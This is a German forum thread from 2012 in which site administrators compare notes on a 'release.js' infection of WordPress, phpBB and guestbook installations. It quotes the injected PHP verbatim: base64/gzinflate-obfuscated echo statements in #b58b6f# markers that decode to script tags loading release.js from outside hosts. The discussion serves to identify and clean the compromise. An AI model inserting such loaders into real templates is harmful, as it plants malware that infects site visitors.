» release.js: Virus in Wordpress, Gästebüchern und Foren

mgutt · 28.03.2012, 11:21

Wordpress 3:
http://www.peterglowka.de/daysofyorr-release-virus-entfernen/
http://forum.wpde.org/design/98457-code-schnipsel-auf-der-seite-charset-utf-8-a-2.html#post433652

phpBB3:
http://www.f1rejects.com/forum/viewtopic.php?f=3&t=4794

Simple Machines 2
http://www.simplemachines.org/community/index.php?topic=470927.0

CMS Builder
http://www.interactivetools.com/iforum/Products_C2/CMS_Builder_F35/Issue_with_Login_P92592/

myPHP Guestbook
bei einem meiner Kunden

Hier eine andere Variante mit direktem JS-Code:
Contao Open Source CMS
http://pastebin.de/24622

Auf Grund der starken Verbreitung in unterschiedlichsten Softwares vermute ich jetzt einfach mal, dass da ein Trojaner hinter steckt, der sich die FTP Logins gestohlen hat. Alternativ wäre auch eine Lücke in PHP oder sonstigen Servermodulen denkbar. Eine MySQL-Injection / XSS Attacke halte ich eher für ausgeschlossen bei dem Verbreitungsgrad.

Falls jemand mehr Infos hat, bitte mitteilen. Auch hätte ich gerne mal eine Kopie von der release.js, damit ich mir mal die Angriffe anschauen kann, die ausgeführt wurden.

Gruß

PhillyGee · Gesperrt Anmeldedatum: 01.05.2010 Beiträge: 3743

Na sehr geil...
Unser Blog von The Lower Life baut auf Wordpress auf und ich habe nun schno desöfteren dubiose GB Einträge gehabt, von unbekannten Leuten mit sehr unseriösen Homepages...

mgutt · 28.03.2012, 11:34

Dies ist der Schadecode, der gerne mal in Templates platziert wird:

#b58b6f# echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#

Daraus wird dann:

<script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script>

Andere Version:

#b58b6f#
echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”)));
#/b58b6f#

<script type=”text/javascript” src=”http://www.daysofyorr.com/release.js”></script>

Was das "b58b6f" soll, konnte ich nicht herausfinden. Vielleicht ein Kürzel für den Hack.

Tornado47 · 28.03.2012, 12:07

mgutt
Was das "b58b6f" soll, konnte ich nicht herausfinden. Vielleicht ein Kürzel für den Hack.

Damits als Hexadezimalfarbe einen schönen rötlich-braunen farbtouch bekommt

(Ich weiß, war ein Schenkelklopfer

)

mgutt · 28.03.2012, 12:09

Der Angriff scheint schon seit Jahren so zu laufen:
https://www.google.de/search?q=%22echo(gzinflate(base64_decode%22

Da gibt es dann auch andere Nummern:
bbfd9f
0773e9
215d25
1b841a
a4bc48
7819f9
usw.

Vermutlich kann der Angreifer so ein Feedback bekommen ob der Angriff gelungen ist.

maxrev.de · Gast

Mach mit!

Wenn Dir die Beiträge zum Thread "release.js: Virus in Wordpress, Gästebüchern und Foren" gefallen haben oder Du noch Fragen hast oder Ergänzungen machen möchtest, solltest Du Dich gleich bei uns anmelden:

Registrierte Mitglieder genießen die folgenden Vorteile:
✔ kostenlose Mitgliedschaft
✔ keine Werbung
✔ direkter Austausch mit Gleichgesinnten
✔ neue Fragen stellen oder Diskussionen starten
✔ schnelle Hilfe bei Problemen
✔ Bilder und Videos hochladen
✔ und vieles mehr...

Autor	Nachricht
mgutt Administrator Name: Marc Geschlecht: Anmeldedatum: 28.08.2004 Beiträge: 52420 Wohnort: Lohmar Meine eBay-Auktionen:	28.03.2012, 11:21 zitieren Wordpress 3: http://www.peterglowka.de/daysofyorr-release-virus-entfernen/ http://forum.wpde.org/design/98457-code-schnipsel-auf-der-seite-charset-utf-8-a-2.html#post433652 phpBB3: http://www.f1rejects.com/forum/viewtopic.php?f=3&t=4794 Simple Machines 2 http://www.simplemachines.org/community/index.php?topic=470927.0 CMS Builder http://www.interactivetools.com/iforum/Products_C2/CMS_Builder_F35/Issue_with_Login_P92592/ myPHP Guestbook bei einem meiner Kunden Hier eine andere Variante mit direktem JS-Code: Contao Open Source CMS http://pastebin.de/24622 Auf Grund der starken Verbreitung in unterschiedlichsten Softwares vermute ich jetzt einfach mal, dass da ein Trojaner hinter steckt, der sich die FTP Logins gestohlen hat. Alternativ wäre auch eine Lücke in PHP oder sonstigen Servermodulen denkbar. Eine MySQL-Injection / XSS Attacke halte ich eher für ausgeschlossen bei dem Verbreitungsgrad. Falls jemand mehr Infos hat, bitte mitteilen. Auch hätte ich gerne mal eine Kopie von der release.js, damit ich mir mal die Angriffe anschauen kann, die ausgeführt wurden. Gruß Gefällt mir Teilen twittern 3x bearbeitet
▲	pn email

PhillyGee Gesperrt Anmeldedatum: 01.05.2010 Beiträge: 3743	28.03.2012, 11:22 zitieren Na sehr geil... Unser Blog von The Lower Life baut auf Wordpress auf und ich habe nun schno desöfteren dubiose GB Einträge gehabt, von unbekannten Leuten mit sehr unseriösen Homepages...
▲	pn

mgutt Administrator Name: Marc Geschlecht: Anmeldedatum: 28.08.2004 Beiträge: 52420 Wohnort: Lohmar Meine eBay-Auktionen:	28.03.2012, 11:34 zitieren Dies ist der Schadecode, der gerne mal in Templates platziert wird: `#b58b6f# echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+"))); #/b58b6f#` Daraus wird dann: `<script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script>` Andere Version: `#b58b6f# echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”))); #/b58b6f#` `<script type=”text/javascript” src=”http://www.daysofyorr.com/release.js”></script>` Was das "b58b6f" soll, konnte ich nicht herausfinden. Vielleicht ein Kürzel für den Hack. Verfasst am: 28.03.2012, 11:58 zitieren Die vermuten auch einen Trojaner, der FTP Passwörter geklaut hat: http://hup.hu/node/112669 Verfasst am: 28.03.2012, 12:02 zitieren Die hatten das auch auf der Seite, aber ich kann leider nicht sehen welches CMS die einsetzen: http://www.gruber-maler.de/produkte_leistungen/index.php
▲	pn email

Tornado47 Premium-Member Name: Max Strammer Geschlecht: Anmeldedatum: 25.01.2009 Beiträge: 11217	28.03.2012, 12:07 zitieren mgutt Was das "b58b6f" soll, konnte ich nicht herausfinden. Vielleicht ein Kürzel für den Hack. Damits als Hexadezimalfarbe einen schönen rötlich-braunen farbtouch bekommt (Ich weiß, war ein Schenkelklopfer )
▲	pn

mgutt Administrator Name: Marc Geschlecht: Anmeldedatum: 28.08.2004 Beiträge: 52420 Wohnort: Lohmar Meine eBay-Auktionen:	28.03.2012, 12:09 zitieren Der Angriff scheint schon seit Jahren so zu laufen: https://www.google.de/search?q=%22echo(gzinflate(base64_decode%22 Da gibt es dann auch andere Nummern: bbfd9f 0773e9 215d25 1b841a a4bc48 7819f9 usw. Vermutlich kann der Angreifer so ein Feedback bekommen ob der Angriff gelungen ist. 4x bearbeitet
▲	pn email

maxrev.de Gast	28.03.2012, 12:09 zitieren Mach mit! Wenn Dir die Beiträge zum Thread "release.js: Virus in Wordpress, Gästebüchern und Foren" gefallen haben oder Du noch Fragen hast oder Ergänzungen machen möchtest, solltest Du Dich gleich bei uns anmelden: Registrierte Mitglieder genießen die folgenden Vorteile: ✔ kostenlose Mitgliedschaft ✔ keine Werbung ✔ direkter Austausch mit Gleichgesinnten ✔ neue Fragen stellen oder Diskussionen starten ✔ schnelle Hilfe bei Problemen ✔ Bilder und Videos hochladen ✔ und vieles mehr...
▲

	Re: √	Letzter Beitrag
WordPress Entwickler:in \| 99° Bewerben Sie sich bis zum 15.06.2023. Jetzt bewerben! Zur Stellenanzeige auf Mein IT Job Ihre Bewerbung richten Sie bitte ausschließlich an die ausgeschriebene Firma. ________ 99° ist eine Designagentur in Wiesbaden mit 15 Mitarbeitern. Wir bieten... von kimjob	0 62	26.04.2023, 17:56 kimjob
Wordpress Ninja (m/w) Unser Klient ist eine aufstrebende Agentur aus Hamburg, die es versteht, ihren Kunden hinsichtlich ihres Webauftrittes sowie der Unternehmensdarstellung immer wieder neue, innovative Ideen präsentieren zu können. Dieses Angebot rundet weiterhin eine... von Martycareer	0 312	25.04.2014, 08:02 Martycareer
Webentwickler / in mit Schwerpunkt WordPress Webentwickler / in mit Schwerpunkt WordPress Web International Services Ltd. Ort: Auf Malta in St. Julians Beginn: Zum nächstmöglichen Termin Anstellungsverhältnis: Vollzeit Berufserfahrung: Mit mindestens 2 Jahren Berufserfahrung Wir entwickeln... von 1000jobboersen.de	0 247	23.04.2015, 12:59 1000jobboersen.de
Werkstudent im Bereich PHP/Wordpress Ort: Hamburg Unser Mandant ist die Full-Service-Agentur für OnlineTV Marketing – unabhängig und netzwerkübergreifend. OnlineTV ist für das Unternehmen modernes und zukunftsweisendes Entertainment – die fortwährende Professionalisierung des Werbemarktes... von Martycareer	0 337	21.03.2014, 14:29 Martycareer
Customer Release Manager (m/w/d) Wir suchen Sie als CUSTOMER RELEASE MANAGER (M/W/D) zur Unterstützung unseres Vertriebs im Geschäftsbereich Systeme für Tankstellen am Standort Mönchengladbach. Scheidt & Bachmann ist ein Familienunternehmen, das seit über 140 Jahren Produkte und... von kimjob	0 150	11.12.2018, 09:48 kimjob
Quick release Lenkrad Hey wollt mal fragen was von günstigen quick releases zu halten ist die es bei ebay gibt? Hat die jmd verbaut? Hab da eins gefunden das schön flach und unauffällig... Seite 2 [Performance]von percybanani	13 898	27.08.2013, 12:09 fago88
Suchen TYPO3 WordPress - Webentwickler (m/w) Zur Verstärkung unseres Teams suchen wir zum nächstmöglichen Zeitpunkt eine oder einen erfahrenen Webentwickler m/w. Dein Aufgabenprofil: -Entwicklung von Web-Anwendungen -Templating -Konzeption und Architektur von Web-Projekten -Sehr gute Kenntnisse in... von Twenty2Media	0 516	10.04.2013, 10:38 Twenty2Media
Hackerangriff in Wordpress? Ich kann helfen! Falls jemand einen gehackten Wordpress Blog hat und nicht weiter weiß, dann kann ich helfen. Der Aufwand lag bei meinen bisherigen Kunden bei max. 3 Stunden. D.h. 150,- € zzgl. Steuer. Wie ich dabei vorgehe: - Seite wird offline genommen - FTP Dateien... von mgutt	0 546	21.10.2016, 23:52 mgutt
Userdatenbank von Mediawiki auf Wordpress übertragen Hi, ich steige demnächst von Mediawiki auf Wordpress um. Ich habe das ganze auch schon gut aufgesetzt, jetzt gibt es nur das Problem, dass ich meine User nicht verlieren will, die sich im Mediawiki registriert haben (auch mittels FB-Connect). Wie kann... von jeffmaster	0 161	23.05.2012, 11:56 jeffmaster
Suche PHP Programmierer für Wordpress Blog Hallo Leute, ich suche - gegen eine "kleine" Bezahlung - einen PHP Programmierer, der mir für den bestehenden Wordpress Blog (BuddyPress) folgende Dinge programmieren kann bzw. bestehende Plugins anpassen kann: 1.) Eine... von UnbeatableMusic	1 511	10.06.2012, 15:21 UnbeatableMusic